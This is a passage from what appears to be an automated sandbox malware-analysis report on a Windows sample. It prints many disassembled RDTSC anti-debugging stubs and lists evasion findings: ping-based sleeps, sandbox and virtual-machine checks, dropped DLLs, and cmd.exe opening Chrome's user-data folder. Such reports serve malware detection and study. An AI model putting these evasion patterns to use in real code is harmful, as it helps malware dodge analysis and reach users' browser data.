Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C50h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684D71997h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C50h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C51h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC92Ah 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684CECA8Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC879h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC887h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC5C7h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C rdtsc 0_2_00403E2C
Contains functionality to read device registry values (via SetupAPI)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 0_2_10019780
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100204C0 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100204C0 2_2_100204C0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 6764 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 7152 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 7164 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A170 FindFirstFileA,FindClose, 0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001A170 FindFirstFileA,FindClose, 2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000003.277122800.0000000003154000.00000004.00000001.sdmp Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 56BB1610C0318054.exe, 00000002.00000003.249619357.0000000002DE1000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.251729735.0000000002C41000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces 